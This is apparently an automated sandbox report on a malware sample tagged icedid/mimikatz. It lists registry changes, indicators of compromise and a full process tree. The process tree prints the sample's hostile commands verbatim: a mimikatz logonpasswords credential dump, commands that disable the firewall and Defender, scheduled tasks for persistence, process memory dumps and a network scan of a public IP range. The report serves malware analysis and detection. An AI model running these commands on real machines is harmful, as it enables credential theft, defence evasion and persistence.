jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" euikgtl.exe Key created \REGISTRY\USER\.DEFAULT\Software jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe -
Modifies registry class 14 IoCs
Processes:
euikgtl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" euikgtl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
euikgtl.exepid process 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exepid process 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exeeuikgtl.exeeuikgtl.exevfshost.exejgqtbilab.execktkgb.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exedescription pid process Token: SeDebugPrivilege 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 852 euikgtl.exe Token: SeDebugPrivilege 3752 euikgtl.exe Token: SeDebugPrivilege 2552 vfshost.exe Token: SeDebugPrivilege 1856 jgqtbilab.exe Token: SeLockMemoryPrivilege 4524 cktkgb.exe Token: SeLockMemoryPrivilege 4524 cktkgb.exe Token: SeDebugPrivilege 3808 jgqtbilab.exe Token: SeDebugPrivilege 1616 jgqtbilab.exe Token: SeDebugPrivilege 1656 jgqtbilab.exe Token: SeDebugPrivilege 4796 jgqtbilab.exe Token: SeDebugPrivilege 3600 jgqtbilab.exe Token: SeDebugPrivilege 1692 jgqtbilab.exe Token: SeDebugPrivilege 2728 jgqtbilab.exe Token: SeDebugPrivilege 2244 jgqtbilab.exe Token: SeDebugPrivilege 3316 jgqtbilab.exe Token: SeDebugPrivilege 3216 jgqtbilab.exe Token: SeDebugPrivilege 4472 jgqtbilab.exe Token: SeDebugPrivilege 4348 jgqtbilab.exe Token: SeDebugPrivilege 3724 jgqtbilab.exe Token: SeDebugPrivilege 3800 jgqtbilab.exe Token: SeDebugPrivilege 1996 jgqtbilab.exe Token: SeDebugPrivilege 2316 jgqtbilab.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exeeuikgtl.exeeuikgtl.exexohudmc.exefkjvgk.exeeuikgtl.exeeuikgtl.exepid process 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe 852 euikgtl.exe 852 euikgtl.exe 3752 euikgtl.exe 3752 euikgtl.exe 3480 xohudmc.exe 3620 fkjvgk.exe 3444 euikgtl.exe 3444 euikgtl.exe 232 euikgtl.exe 232 euikgtl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.execmd.exeeuikgtl.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 2808 wrote to memory of 4324 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe cmd.exe PID 2808 wrote to memory of 4324 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe cmd.exe PID 2808 wrote to memory of 4324 2808 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe cmd.exe PID 4324 wrote to memory of 3032 4324 cmd.exe PING.EXE PID 4324 wrote to memory of 3032 4324 cmd.exe PING.EXE PID 4324 wrote to memory of 3032 4324 cmd.exe PING.EXE PID 4324 wrote to memory of 852 4324 cmd.exe euikgtl.exe PID 4324 wrote to memory of 852 4324 cmd.exe euikgtl.exe PID 4324 wrote to memory of 852 4324 cmd.exe euikgtl.exe PID 3752 wrote to memory of 2356 3752 euikgtl.exe cmd.exe PID 3752 wrote to memory of 2356 3752 euikgtl.exe cmd.exe PID 3752 wrote to memory of 2356 3752 euikgtl.exe cmd.exe PID 2356 wrote to memory of 4188 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4188 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4188 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4436 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 4436 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 4436 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 2012 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 2012 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 2012 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4628 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 4628 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 4628 2356 cmd.exe cacls.exe PID 3752 wrote to memory of 4852 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 4852 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 4852 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 3464 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 3464 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 3464 3752 euikgtl.exe netsh.exe PID 2356 wrote to memory of 2224 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 2224 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 2224 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 3160 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 3160 2356 cmd.exe cacls.exe PID 2356 wrote to memory of 3160 2356 cmd.exe cacls.exe PID 3752 wrote to memory of 2456 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 2456 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 2456 3752 euikgtl.exe netsh.exe PID 3752 wrote to memory of 1824 3752 euikgtl.exe cmd.exe PID 3752 wrote to memory of 1824 3752 euikgtl.exe cmd.exe PID 3752 wrote to memory of 1824 3752 euikgtl.exe cmd.exe PID 1824 wrote to memory of 4536 1824 cmd.exe wpcap.exe PID 1824 wrote to memory of 4536 1824 cmd.exe wpcap.exe PID 1824 wrote to memory of 4536 1824 cmd.exe wpcap.exe PID 4536 wrote to memory of 4620 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4620 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4620 4536 wpcap.exe net.exe PID 4620 wrote to memory of 1872 4620 net.exe net1.exe PID 4620 wrote to memory of 1872 4620 net.exe net1.exe PID 4620 wrote to memory of 1872 4620 net.exe net1.exe PID 4536 wrote to memory of 4716 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4716 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4716 4536 wpcap.exe net.exe PID 4716 wrote to memory of 3592 4716 net.exe net1.exe PID 4716 wrote to memory of 3592 4716 net.exe net1.exe PID 4716 wrote to memory of 3592 4716 net.exe net1.exe PID 4536 wrote to memory of 4784 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4784 4536 wpcap.exe net.exe PID 4536 wrote to memory of 4784 4536 wpcap.exe net.exe PID 4784 wrote to memory of 4348 4784 net.exe net1.exe PID 4784 wrote to memory of 4348 4784 net.exe net1.exe PID 4784 wrote to memory of 4348 4784 net.exe net1.exe PID 4536 wrote to memory of 2640 4536 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2204
-
C:\Windows\TEMP\tskqpisje\cktkgb.exe"C:\Windows\TEMP\tskqpisje\cktkgb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
C:\Users\Admin\AppData\Local\Temp\2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\itspapsg\euikgtl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3032 -
C:\Windows\itspapsg\euikgtl.exeC:\Windows\itspapsg\euikgtl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:852
-
C:\Windows\itspapsg\euikgtl.exeC:\Windows\itspapsg\euikgtl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4188
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4436
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2012
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4628
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2224
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3160
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4852
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3464
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\lubbeisit\abkgigiey\wpcap.exeC:\Windows\lubbeisit\abkgigiey\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1872
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3592
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4348
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:388
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1616
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4676
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1208
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2436
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt2⤵PID:1492
-
C:\Windows\lubbeisit\abkgigiey\bqalurljg.exeC:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4032 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lubbeisit\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3528 -
C:\Windows\lubbeisit\Corporate\vfshost.exeC:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"2⤵PID:4084
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2856
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"3⤵
- Creates scheduled task(s)
PID:4496 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"2⤵PID:4952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2692
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2528 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4500
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2732 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:2456
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:2560
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2720
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1312
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4288
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3880
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:5116
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1952
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4452
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2420
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:5048
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:872
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3824
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1812
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:216
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:852 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2676
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2672 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2508
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3316
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2484
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:3256
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2252
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3852
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:3160
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4768 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:432
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4184 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2244
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2832 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3648
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1972 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 776 C:\Windows\TEMP\lubbeisit\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3480 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 60 C:\Windows\TEMP\lubbeisit\60.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3808 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2204 C:\Windows\TEMP\lubbeisit\2204.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2564 C:\Windows\TEMP\lubbeisit\2564.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2760 C:\Windows\TEMP\lubbeisit\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2920 C:\Windows\TEMP\lubbeisit\2920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3600 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3108 C:\Windows\TEMP\lubbeisit\3108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1692 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3856 C:\Windows\TEMP\lubbeisit\3856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2728 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3944 C:\Windows\TEMP\lubbeisit\3944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4008 C:\Windows\TEMP\lubbeisit\4008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3316 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2908 C:\Windows\TEMP\lubbeisit\2908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3216 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 1128 C:\Windows\TEMP\lubbeisit\1128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4044 C:\Windows\TEMP\lubbeisit\4044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4348 -
C:\Windows\TEMP\lubbeisit\jgqtbilab.exeC:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2576 C:\Windows\TEMP\lubbeisit\2576.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3724 -
